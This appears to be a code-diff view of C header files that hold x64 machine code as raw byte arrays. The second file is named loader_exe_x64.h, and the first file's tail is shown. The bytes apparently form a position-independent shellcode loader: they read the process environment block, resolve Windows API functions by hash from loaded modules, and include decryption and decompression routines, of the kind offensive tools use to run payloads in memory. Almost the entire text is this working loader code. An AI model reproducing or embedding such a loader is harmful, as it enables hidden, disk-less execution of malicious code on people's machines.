674 0x44, 0x24, 0x50, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8d, 0x05, 0xb2, 0xe1,
675 0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48, 0x8d, 0x05, 0x96, 0xe1,
676 0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x58, 0x48, 0x8d, 0x05, 0xf2, 0xe1,
677 0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x60, 0x48, 0x8d, 0x05, 0x86, 0xe1,
678 0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x68, 0x48, 0x8d, 0x05, 0x7a, 0xe1,
679 0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x70, 0x48, 0x8d, 0x45, 0x40, 0x48,
680 0x89, 0x45, 0x08, 0x48, 0x89, 0x75, 0x00, 0xe8, 0x9c, 0xeb, 0xff, 0xff,
681 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x96, 0x48, 0x01, 0x00, 0x00, 0x85, 0xc0,
682 0x0f, 0x85, 0x4c, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x60, 0x03, 0x00,
683 0x00, 0x33, 0xd2, 0x4c, 0x8d, 0x8e, 0x94, 0x06, 0x00, 0x00, 0x48, 0x89,
684 0x44, 0x24, 0x20, 0x48, 0x8d, 0x8e, 0x74, 0x06, 0x00, 0x00, 0x44, 0x8d,
685 0x43, 0x04, 0xff, 0x96, 0x50, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85,
686 0x1e, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x60, 0x03, 0x00, 0x00, 0x48,
687 0x8d, 0x96, 0xd4, 0x06, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x70, 0x03, 0x00,
688 0x00, 0x48, 0x8b, 0x01, 0xff, 0x10, 0x85, 0xc0, 0x0f, 0x85, 0xe2, 0x00,
689 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x01,
690 0xff, 0x50, 0x18, 0x85, 0xc0, 0x0f, 0x85, 0xc0, 0x00, 0x00, 0x00, 0x48,
691 0x8b, 0x8d, 0x60, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x48, 0x89,
692 0x4d, 0x20, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x18, 0x85, 0xc0, 0x0f, 0x85,
693 0xa3, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x30, 0x01, 0x00, 0x00, 0xc7,
694 0x44, 0x24, 0x28, 0x00, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x86, 0xe0, 0x05,
695 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x44, 0x8b, 0xcb, 0x33, 0xd2,
696 0x33, 0xc9, 0xff, 0x56, 0x70, 0x48, 0x8d, 0x8d, 0x30, 0x01, 0x00, 0x00,
697 0xff, 0x96, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x60, 0x03, 0x00,
698 0x00, 0x44, 0x8d, 0x43, 0x03, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xf8, 0x4c,
699 0x8b, 0x09, 0x41, 0xff, 0x51, 0x40, 0x48, 0x8b, 0xcf, 0x8b, 0xd8, 0xff,
700 0x96, 0xe0, 0x00, 0x00, 0x00, 0x85, 0xdb, 0x75, 0x4a, 0x48, 0x83, 0x64,
701 0x24, 0x48, 0x00, 0x45, 0x33, 0xc9, 0x48, 0x83, 0x64, 0x24, 0x40, 0x00,
702 0x45, 0x33, 0xc0, 0x21, 0x5c, 0x24, 0x38, 0x49, 0x8b, 0xd6, 0x48, 0x8b,
703 0x8d, 0x70, 0x03, 0x00, 0x00, 0x21, 0x5c, 0x24, 0x30, 0x48, 0x83, 0x64,
704 0x24, 0x28, 0x00, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x48, 0x8b, 0x01,
705 0xff, 0x50, 0x28, 0x85, 0xc0, 0x75, 0x10, 0x48, 0x8b, 0x8d, 0x60, 0x03,
706 0x00, 0x00, 0x8d, 0x53, 0x02, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x28, 0x48,
707 0x8b, 0x8d, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10,
708 0x48, 0x8b, 0x8d, 0x60, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff, 0x50,
709 0x38, 0x48, 0x8b, 0x8d, 0x60, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff,
710 0x50, 0x10, 0x44, 0x8b, 0x86, 0x18, 0x09, 0x00, 0x00, 0x33, 0xd2, 0x49,
711 0x8b, 0xce, 0x46, 0x8d, 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0xe8, 0x41,
712 0x08, 0x00, 0x00, 0x33, 0xd2, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0x49,
713 0x8b, 0xce, 0xff, 0x56, 0x50, 0x4c, 0x8d, 0x9c, 0x24, 0x40, 0x04, 0x00,
714 0x00, 0x49, 0x8b, 0x5b, 0x28, 0x49, 0x8b, 0x73, 0x38, 0x49, 0x8b, 0xe3,
715 0x41, 0x5e, 0x5f, 0x5d, 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
716 0x18, 0x48, 0x89, 0x54, 0x24, 0x10, 0x55, 0x56, 0x57, 0x41, 0x54, 0x41,
717 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00,
718 0x65, 0x48, 0x8b, 0x04, 0x25, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xf1,
719 0x48, 0x81, 0xc1, 0x4c, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x68, 0x60, 0x4d,
720 0x8b, 0x65, 0x20, 0x4c, 0x89, 0xa4, 0x24, 0xf0, 0x00, 0x00, 0x00, 0xff,
721 0x56, 0x40, 0x33, 0xc9, 0x4c, 0x8b, 0xd8, 0x4c, 0x63, 0x48, 0x3c, 0x4c,
722 0x03, 0xc8, 0x45, 0x0f, 0xb7, 0x51, 0x14, 0x45, 0x0f, 0xb7, 0x41, 0x06,
723 0x4d, 0x03, 0xd1, 0x45, 0x85, 0xc0, 0x74, 0x19, 0x44, 0x8b, 0x8e, 0x44,
724 0x03, 0x00, 0x00, 0x48, 0x8d, 0x04, 0x89, 0x45, 0x39, 0x4c, 0xc2, 0x18,
725 0x74, 0x73, 0xff, 0xc1, 0x41, 0x3b, 0xc8, 0x72, 0xee, 0x8b, 0x9c, 0x24,
726 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xbc, 0x24, 0xf0, 0x00, 0x00, 0x00,
727 0x33, 0xed, 0x85, 0xdb, 0x74, 0x3a, 0x4c, 0x8b, 0xf7, 0x49, 0x8b, 0x56,
728 0x08, 0x48, 0x8b, 0xce, 0xe8, 0xeb, 0xec, 0xff, 0xff, 0x85, 0xc0, 0x74,
729 0x1d, 0x41, 0xb0, 0x01, 0x49, 0x8d, 0x4c, 0x24, 0x70, 0x49, 0x8b, 0xd6,
730 0xff, 0x96, 0x60, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x45, 0x4c, 0x8b,
731 0xa4, 0x24, 0xf0, 0x00, 0x00, 0x00, 0xff, 0xc5, 0x49, 0x83, 0xc6, 0x08,
732 0x3b, 0xeb, 0x72, 0xc9, 0x33, 0xc0, 0x48, 0x8b, 0x9c, 0x24, 0x00, 0x01,
733 0x00, 0x00, 0x48, 0x81, 0xc4, 0xb0, 0x00, 0x00, 0x00, 0x41, 0x5f, 0x41,
734 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5d, 0xc3, 0x48, 0x8d, 0x04,
735 0x89, 0x41, 0x8b, 0x7c, 0xc2, 0x24, 0x41, 0x8b, 0x5c, 0xc2, 0x20, 0x49,
736 0x03, 0xfb, 0xc1, 0xeb, 0x03, 0xeb, 0x8d, 0x41, 0xb0, 0x01, 0x49, 0x8d,
737 0x54, 0x24, 0x70, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0xff, 0x96, 0x70, 0x01,
738 0x00, 0x00, 0x48, 0x8b, 0x94, 0x24, 0xf8, 0x00, 0x00, 0x00, 0x49, 0x8b,
739 0xce, 0xff, 0x96, 0x90, 0x01, 0x00, 0x00, 0x33, 0xed, 0x4c, 0x8b, 0xff,
740 0x49, 0x8b, 0x57, 0x08, 0x48, 0x8b, 0xce, 0xe8, 0x58, 0xec, 0xff, 0xff,
741 0x85, 0xc0, 0x74, 0x15, 0x41, 0xb0, 0x01, 0x48, 0x8d, 0x4c, 0x24, 0x20,
742 0x49, 0x8b, 0xd7, 0xff, 0x96, 0x68, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x75,
743 0x13, 0x41, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x49, 0x83, 0xc7, 0x08, 0x41,
744 0x03, 0xe9, 0x3b, 0xeb, 0x73, 0x2d, 0xeb, 0xc8, 0x41, 0xb0, 0x01, 0x48,
745 0x8d, 0x4c, 0x24, 0x20, 0x49, 0x8b, 0xd6, 0xff, 0x96, 0x70, 0x01, 0x00,
746 0x00, 0x48, 0x8d, 0x0c, 0xef, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48,
747 0x8d, 0x54, 0x24, 0x20, 0xe8, 0x77, 0x06, 0x00, 0x00, 0x41, 0xb9, 0x01,
748 0x00, 0x00, 0x00, 0x49, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x78, 0x10, 0xe9,
749 0xdb, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0xbe, 0x6c, 0x03, 0x00, 0x00, 0x41,
750 0x8a, 0x0f, 0x33, 0xed, 0x33, 0xd2, 0x45, 0x8b, 0xe1, 0x84, 0xc9, 0x0f,
751 0x84, 0xbf, 0x00, 0x00, 0x00, 0x45, 0x33, 0xc0, 0x80, 0xf9, 0x3b, 0x74,
752 0x2e, 0x81, 0xfa, 0x80, 0x00, 0x00, 0x00, 0x73, 0x26, 0x33, 0xc0, 0x42,
753 0x88, 0x4c, 0x04, 0x30, 0x80, 0xf9, 0x77, 0x41, 0x0f, 0x45, 0xc4, 0x80,
754 0xf9, 0x70, 0x44, 0x8b, 0xe0, 0x41, 0x0f, 0x44, 0xe9, 0x41, 0x03, 0xd1,
755 0x44, 0x8b, 0xc2, 0x42, 0x8a, 0x0c, 0x3a, 0x84, 0xc9, 0x75, 0xcd, 0x85,
756 0xd2, 0x0f, 0x84, 0x81, 0x00, 0x00, 0x00, 0x8d, 0x4a, 0x01, 0xc6, 0x44,
757 0x14, 0x30, 0x00, 0x4c, 0x03, 0xf9, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48,
758 0x8b, 0x4f, 0x30, 0xff, 0x56, 0x38, 0x48, 0x8b, 0xd8, 0x41, 0xb9, 0x01,
759 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x8b, 0x45, 0x85, 0xe4, 0x74,
760 0x29, 0x85, 0xed, 0x74, 0x05, 0xff, 0xd3, 0x48, 0x8b, 0xd8, 0x41, 0xb9,
761 0x01, 0x00, 0x00, 0x00, 0x48, 0x85, 0xdb, 0x0f, 0x84, 0x6e, 0xff, 0xff,
762 0xff, 0x48, 0x83, 0x3b, 0x00, 0x0f, 0x84, 0x64, 0xff, 0xff, 0xff, 0x48,
763 0x8b, 0x44, 0x24, 0x28, 0xeb, 0x26, 0x85, 0xed, 0x74, 0x05, 0xff, 0xd3,
764 0x48, 0x8b, 0xd8, 0x41, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x48, 0x85, 0xdb,
765 0x0f, 0x84, 0x45, 0xff, 0xff, 0xff, 0x48, 0x83, 0x3b, 0x00, 0x0f, 0x84,
766 0x3b, 0xff, 0xff, 0xff, 0x49, 0x8b, 0x46, 0x08, 0x48, 0x89, 0x03, 0xe9,
767 0x2f, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x3f, 0x48, 0x83, 0x7f, 0x30, 0x00,
768 0x0f, 0x85, 0x1a, 0xff, 0xff, 0xff, 0x41, 0x8b, 0xc1, 0xe9, 0x48, 0xfe,
769 0xff, 0xff, 0xcc, 0xcc, 0x41, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33,
770 0xc0, 0xc3, 0xcc, 0xcc, 0x2b, 0xca, 0x8b, 0xc1, 0xc3, 0xcc, 0xcc, 0xcc,
771 0x44, 0x8b, 0xc2, 0x8b, 0xc1, 0x99, 0x41, 0xf7, 0xf8, 0xc3, 0xcc, 0xcc,
772 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x6c, 0x24, 0x10, 0x48, 0x89,
773 0x74, 0x24, 0x18, 0x57, 0x48, 0x83, 0xec, 0x20, 0x65, 0x48, 0x8b, 0x04,
774 0x25, 0x30, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xf8, 0x48, 0x8b, 0xf2, 0x48,
775 0x8b, 0xe9, 0x45, 0x33, 0xd2, 0x4c, 0x8b, 0x48, 0x60, 0x49, 0x8b, 0x41,
776 0x18, 0x48, 0x8b, 0x58, 0x10, 0xeb, 0x1c, 0x4d, 0x85, 0xd2, 0x75, 0x20,
777 0x4c, 0x8b, 0xcf, 0x4c, 0x8b, 0xc6, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcd,
778 0xe8, 0xc3, 0xe3, 0xff, 0xff, 0x48, 0x8b, 0x1b, 0x4c, 0x8b, 0xd0, 0x48,
779 0x8b, 0x43, 0x30, 0x48, 0x85, 0xc0, 0x75, 0xdb, 0x48, 0x8b, 0x5c, 0x24,
780 0x30, 0x49, 0x8b, 0xc2, 0x48, 0x8b, 0x6c, 0x24, 0x38, 0x48, 0x8b, 0x74,
781 0x24, 0x40, 0x48, 0x83, 0xc4, 0x20, 0x5f, 0xc3, 0x48, 0x89, 0x5c, 0x24,
782 0x08, 0x48, 0x89, 0x6c, 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x18, 0x57,
783 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xec, 0x30, 0x33, 0xff, 0x33, 0xed,
784 0x45, 0x33, 0xf6, 0x48, 0x8b, 0xf2, 0x4c, 0x8b, 0xf9, 0x42, 0x8a, 0x54,
785 0x3d, 0x00, 0x84, 0xd2, 0x74, 0x11, 0x83, 0xfd, 0x40, 0x74, 0x0c, 0x8b,
786 0xc7, 0xff, 0xc7, 0xff, 0xc5, 0x88, 0x54, 0x04, 0x20, 0xeb, 0x56, 0x8b,
787 0xc7, 0x48, 0x8d, 0x5c, 0x24, 0x20, 0x48, 0x03, 0xd8, 0x41, 0xb8, 0x10,
788 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0x44, 0x2b, 0xc7, 0x33, 0xd2, 0xe8,
789 0xa4, 0x04, 0x00, 0x00, 0xc6, 0x03, 0x80, 0x83, 0xff, 0x0c, 0x72, 0x20,
790 0x48, 0x8b, 0xd6, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0xe8, 0x63, 0x00, 0x00,
791 0x00, 0x33, 0xd2, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0x48, 0x33, 0xf0, 0x44,
792 0x8d, 0x42, 0x10, 0xe8, 0x7c, 0x04, 0x00, 0x00, 0x8b, 0xc5, 0xbf, 0x10,
793 0x00, 0x00, 0x00, 0xc1, 0xe0, 0x03, 0x89, 0x44, 0x24, 0x2c, 0x41, 0xff,
794 0xc6, 0x83, 0xff, 0x10, 0x75, 0x12, 0x48, 0x8b, 0xd6, 0x48, 0x8d, 0x4c,
795 0x24, 0x20, 0xe8, 0x2d, 0x00, 0x00, 0x00, 0x48, 0x33, 0xf0, 0x33, 0xff,
796 0x45, 0x85, 0xf6, 0x0f, 0x84, 0x70, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x5c,
797 0x24, 0x50, 0x48, 0x8b, 0xc6, 0x48, 0x8b, 0x74, 0x24, 0x60, 0x48, 0x8b,
798 0x6c, 0x24, 0x58, 0x48, 0x83, 0xc4, 0x30, 0x41, 0x5f, 0x41, 0x5e, 0x5f,
799 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x53, 0x48, 0x83, 0xec, 0x10,
800 0x0f, 0x10, 0x01, 0x48, 0x89, 0x50, 0x10, 0x8b, 0xca, 0x44, 0x8b, 0x40,
801 0x14, 0x45, 0x33, 0xd2, 0x0f, 0x11, 0x04, 0x24, 0x8b, 0x50, 0xf4, 0x44,
802 0x8b, 0x58, 0xf0, 0x8b, 0x58, 0xec, 0x44, 0x8b, 0x0c, 0x24, 0x8b, 0xc2,
803 0xc1, 0xc9, 0x08, 0x41, 0x03, 0xc8, 0x8b, 0xd3, 0x41, 0x33, 0xc9, 0xc1,
804 0xca, 0x08, 0x41, 0x03, 0xd1, 0x41, 0xc1, 0xc0, 0x03, 0x41, 0x33, 0xd2,
805 0x41, 0xc1, 0xc1, 0x03, 0x44, 0x33, 0xca, 0x44, 0x33, 0xc1, 0x41, 0xff,
806 0xc2, 0x41, 0x8b, 0xdb, 0x44, 0x8b, 0xd8, 0x41, 0x83, 0xfa, 0x1b, 0x72,
807 0xcd, 0x89, 0x4c, 0x24, 0x28, 0x44, 0x89, 0x44, 0x24, 0x2c, 0x48, 0x8b,
808 0x44, 0x24, 0x28, 0x48, 0x83, 0xc4, 0x10, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc,
809 0x45, 0x85, 0xc9, 0x0f, 0x84, 0x10, 0x01, 0x00, 0x00, 0x48, 0x89, 0x5c,
810 0x24, 0x08, 0x48, 0x89, 0x7c, 0x24, 0x10, 0x4c, 0x89, 0x74, 0x24, 0x18,
811 0x55, 0x48, 0x8b, 0xec, 0x48, 0x83, 0xec, 0x10, 0x4c, 0x8b, 0xd1, 0x48,
812 0x8d, 0x45, 0xf0, 0x4c, 0x2b, 0xd0, 0x4d, 0x8b, 0xd8, 0x48, 0x8b, 0xfa,
813 0x41, 0xbe, 0x10, 0x00, 0x00, 0x00, 0x0f, 0x10, 0x07, 0x48, 0x8d, 0x4d,
814 0xf0, 0xba, 0x04, 0x00, 0x00, 0x00, 0xf3, 0x0f, 0x7f, 0x45, 0xf0, 0x41,
815 0x8b, 0x04, 0x0a, 0x31, 0x01, 0x48, 0x8d, 0x49, 0x04, 0x48, 0x83, 0xea,
816 0x01, 0x75, 0xf0, 0x8b, 0x55, 0xfc, 0x49, 0x8b, 0xde, 0x8b, 0x45, 0xf8,
817 0x44, 0x8b, 0x45, 0xf4, 0x8b, 0x4d, 0xf0, 0x41, 0x03, 0xc8, 0x03, 0xc2,
818 0x41, 0xc1, 0xc0, 0x05, 0x44, 0x33, 0xc1, 0xc1, 0xc2, 0x08, 0x33, 0xd0,
819 0xc1, 0xc1, 0x10, 0x41, 0x03, 0xc0, 0x03, 0xca, 0x41, 0xc1, 0xc0, 0x07,
820 0xc1, 0xc2, 0x0d, 0x44, 0x33, 0xc0, 0x33, 0xd1, 0xc1, 0xc0, 0x10, 0x48,
821 0x83, 0xeb, 0x01, 0x75, 0xd2, 0x89, 0x55, 0xfc, 0x8d, 0x53, 0x04, 0x89,
822 0x4d, 0xf0, 0x48, 0x8d, 0x4d, 0xf0, 0x44, 0x89, 0x45, 0xf4, 0x89, 0x45,
823 0xf8, 0x42, 0x8b, 0x04, 0x11, 0x31, 0x01, 0x48, 0x8d, 0x49, 0x04, 0x48,
824 0x83, 0xea, 0x01, 0x75, 0xf0, 0x45, 0x3b, 0xce, 0x41, 0x8b, 0xc9, 0x41,
825 0x0f, 0x47, 0xce, 0x85, 0xc9, 0x74, 0x1b, 0x4c, 0x8d, 0x45, 0xf0, 0x8b,
826 0xd9, 0x4d, 0x2b, 0xc3, 0x49, 0x8b, 0xd3, 0x41, 0x8a, 0x04, 0x10, 0x30,
827 0x02, 0x48, 0xff, 0xc2, 0x48, 0x83, 0xeb, 0x01, 0x75, 0xf1, 0x44, 0x2b,
828 0xc9, 0x8b, 0xc1, 0x4c, 0x03, 0xd8, 0x41, 0x8b, 0xd6, 0x8d, 0x42, 0xff,
829 0x80, 0x04, 0x38, 0x01, 0x75, 0x06, 0xff, 0xca, 0x85, 0xd2, 0x7f, 0xf1,
830 0x45, 0x85, 0xc9, 0x0f, 0x85, 0x31, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x5c,
831 0x24, 0x20, 0x48, 0x8b, 0x7c, 0x24, 0x28, 0x4c, 0x8b, 0x74, 0x24, 0x30,
832 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x48,
833 0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x10, 0x48, 0x89, 0x78, 0x18, 0x4c,
834 0x89, 0x70, 0x20, 0x55, 0x48, 0x8b, 0xec, 0x48, 0x83, 0xec, 0x40, 0x8a,
835 0x01, 0x41, 0x83, 0xce, 0xff, 0x83, 0x65, 0xf4, 0x00, 0x45, 0x33, 0xc9,
836 0x88, 0x02, 0x33, 0xff, 0x48, 0x8d, 0x42, 0x01, 0x48, 0x8b, 0xda, 0x48,
837 0x89, 0x45, 0xe8, 0x45, 0x8b, 0xde, 0x48, 0x8d, 0x41, 0x01, 0x48, 0x89,
838 0x45, 0xe0, 0x8d, 0x77, 0x01, 0x48, 0x8d, 0x4d, 0xe0, 0xe8, 0xf6, 0x01,
839 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xaa, 0x01, 0x00, 0x00, 0x48, 0x8d,
840 0x4d, 0xe0, 0xe8, 0xe5, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x9f,
841 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xe0, 0xe8, 0xd4, 0x01, 0x00, 0x00,
842 0x85, 0xc0, 0x74, 0x4e, 0x45, 0x33, 0xc9, 0x45, 0x8d, 0x51, 0x04, 0x48,
843 0x8d, 0x4d, 0xe0, 0xe8, 0xc0, 0x01, 0x00, 0x00, 0x46, 0x8d, 0x0c, 0x48,
844 0x44, 0x2b, 0xd6, 0x75, 0xee, 0x45, 0x85, 0xc9, 0x74, 0x1d, 0x48, 0x8b,
845 0x55, 0xe8, 0x48, 0x8b, 0xc2, 0x41, 0x8b, 0xc9, 0x48, 0x2b, 0xc1, 0x8a,
846 0x00, 0x88, 0x02, 0x48, 0x03, 0xd6, 0x48, 0x89, 0x55, 0xe8, 0xe9, 0x6b,
847 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0xc6, 0x00, 0x00, 0x48, 0x03,
848 0xc6, 0x48, 0x89, 0x45, 0xe8, 0xe9, 0x58, 0x01, 0x00, 0x00, 0x48, 0x8b,
849 0x45, 0xe0, 0x44, 0x0f, 0xb6, 0x18, 0x48, 0x03, 0xc6, 0x41, 0x8b, 0xcb,
850 0x48, 0x89, 0x45, 0xe0, 0x23, 0xce, 0x83, 0xc1, 0x02, 0x41, 0xd1, 0xeb,
851 0x74, 0x21, 0x48, 0x8b, 0x55, 0xe8, 0x45, 0x8b, 0xc3, 0x49, 0xf7, 0xd8,
852 0x41, 0x8a, 0x04, 0x10, 0x88, 0x02, 0x48, 0x03, 0xd6, 0x41, 0x03, 0xce,
853 0x75, 0xf2, 0x48, 0x89, 0x55, 0xe8, 0xe9, 0xfc, 0x00, 0x00, 0x00, 0x8b,
854 0xfe, 0xe9, 0xf5, 0x00, 0x00, 0x00, 0x44, 0x8b, 0xd6, 0x48, 0x8d, 0x4d,
855 0xe0, 0xe8, 0x32, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xe0, 0x46, 0x8d,
856 0x14, 0x50, 0xe8, 0x25, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x75, 0xe6, 0x45,
857 0x85, 0xc9, 0x75, 0x48, 0x41, 0x83, 0xfa, 0x02, 0x75, 0x42, 0x44, 0x8b,
858 0xce, 0x48, 0x8d, 0x4d, 0xe0, 0xe8, 0x0a, 0x01, 0x00, 0x00, 0x48, 0x8d,
859 0x4d, 0xe0, 0x46, 0x8d, 0x0c, 0x48, 0xe8, 0xfd, 0x00, 0x00, 0x00, 0x85,
860 0xc0, 0x75, 0xe6, 0x45, 0x85, 0xc9, 0x0f, 0x84, 0xa7, 0x00, 0x00, 0x00,
861 0x48, 0x8b, 0x4d, 0xe8, 0x41, 0x8b, 0xd3, 0x48, 0xf7, 0xda, 0x8a, 0x04,
862 0x0a, 0x88, 0x01, 0x48, 0x03, 0xce, 0x45, 0x03, 0xce, 0x75, 0xf3, 0xe9,
863 0x87, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xe0, 0x44, 0x33, 0xce, 0x45,
864 0x2b, 0xd1, 0x44, 0x8b, 0xce, 0x41, 0xc1, 0xe2, 0x08, 0x44, 0x0f, 0xb6,
865 0x19, 0x41, 0x81, 0xc3, 0x00, 0xfe, 0xff, 0xff, 0x45, 0x03, 0xda, 0x48,
866 0x03, 0xce, 0x48, 0x89, 0x4d, 0xe0, 0x48, 0x8d, 0x4d, 0xe0, 0xe8, 0xa5,
867 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xe0, 0x46, 0x8d, 0x0c, 0x48, 0xe8,
868 0x98, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0xe6, 0x41, 0x81, 0xfb, 0x00,
869 0x7d, 0x00, 0x00, 0x41, 0x8d, 0x41, 0x01, 0x41, 0x0f, 0x42, 0xc1, 0x41,
870 0x81, 0xfb, 0x00, 0x05, 0x00, 0x00, 0x8d, 0x48, 0x01, 0x0f, 0x42, 0xc8,
871 0x41, 0x81, 0xfb, 0x80, 0x00, 0x00, 0x00, 0x44, 0x8d, 0x41, 0x02, 0x44,
872 0x0f, 0x43, 0xc1, 0x45, 0x85, 0xc0, 0x74, 0x1b, 0x48, 0x8b, 0x4d, 0xe8,
873 0x41, 0x8b, 0xd3, 0x48, 0xf7, 0xda, 0x8a, 0x04, 0x0a, 0x88, 0x01, 0x48,
874 0x03, 0xce, 0x45, 0x03, 0xc6, 0x75, 0xf3, 0x48, 0x89, 0x4d, 0xe8, 0x44,
875 0x8b, 0xce, 0xeb, 0x1d, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x4d, 0xe8,
876 0x8a, 0x02, 0x88, 0x01, 0x48, 0x03, 0xce, 0x48, 0x03, 0xd6, 0x48, 0x89,
877 0x4d, 0xe8, 0x48, 0x89, 0x55, 0xe0, 0x45, 0x33, 0xc9, 0x85, 0xff, 0x0f,
878 0x84, 0x20, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x74, 0x24,
879 0x58, 0x2b, 0xc3, 0x48, 0x8b, 0x5c, 0x24, 0x50, 0x48, 0x8b, 0x7c, 0x24,
880 0x60, 0x4c, 0x8b, 0x74, 0x24, 0x68, 0x48, 0x83, 0xc4, 0x40, 0x5d, 0xc3,
881 0x8b, 0x51, 0x14, 0x4c, 0x8b, 0xc1, 0x8d, 0x42, 0xff, 0x89, 0x41, 0x14,
882 0x85, 0xd2, 0x75, 0x17, 0x48, 0x8b, 0x01, 0x0f, 0xb6, 0x10, 0x48, 0xff,
883 0xc0, 0x48, 0x89, 0x01, 0x8b, 0xc2, 0xc7, 0x41, 0x14, 0x07, 0x00, 0x00,
884 0x00, 0xeb, 0x03, 0x8b, 0x41, 0x10, 0x8d, 0x0c, 0x00, 0xc1, 0xe8, 0x07,
885 0x83, 0xe0, 0x01, 0x41, 0x89, 0x48, 0x10, 0xc3, 0x4c, 0x8b, 0xc9, 0x45,
886 0x85, 0xc0, 0x74, 0x13, 0x48, 0x2b, 0xd1, 0x42, 0x8a, 0x04, 0x0a, 0x41,
887 0x88, 0x01, 0x49, 0xff, 0xc1, 0x41, 0x83, 0xc0, 0xff, 0x75, 0xf0, 0x48,
888 0x8b, 0xc1, 0xc3, 0xcc, 0x48, 0x89, 0x7c, 0x24, 0x08, 0x4c, 0x8b, 0xc9,
889 0x8a, 0xc2, 0x49, 0x8b, 0xf9, 0x41, 0x8b, 0xc8, 0xf3, 0xaa, 0x48, 0x8b,
890 0x7c, 0x24, 0x08, 0x49, 0x8b, 0xc1, 0xc3, 0xcc, 0xeb, 0x0f, 0x80, 0x3a,
891 0x00, 0x74, 0x10, 0x3a, 0x02, 0x75, 0x0c, 0x48, 0xff, 0xc1, 0x48, 0xff,
892 0xc2, 0x8a, 0x01, 0x84, 0xc0, 0x75, 0xeb, 0x0f, 0xbe, 0x01, 0x0f, 0xbe,
893 0x0a, 0x2b, 0xc1, 0xc3};
894
+892
-0
loader_exe_x64.h less more
0
1 unsigned char LOADER_EXE_X64[] = {
2 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x6c, 0x24, 0x10, 0x48, 0x89,
3 0x74, 0x24, 0x18, 0x57, 0x48, 0x81, 0xec, 0x00, 0x05, 0x00, 0x00, 0x33,
4 0xff, 0x48, 0x8b, 0xd9, 0x48, 0x39, 0xb9, 0x38, 0x02, 0x00, 0x00, 0x0f,
5 0x84, 0xc0, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x41, 0x28, 0x48, 0x8b, 0x91,
6 0x88, 0x00, 0x00, 0x00, 0xe8, 0xbb, 0x23, 0x00, 0x00, 0x48, 0x85, 0xc0,
7 0x0f, 0x84, 0xa1, 0x00, 0x00, 0x00, 0x48, 0x21, 0x7c, 0x24, 0x28, 0x4c,
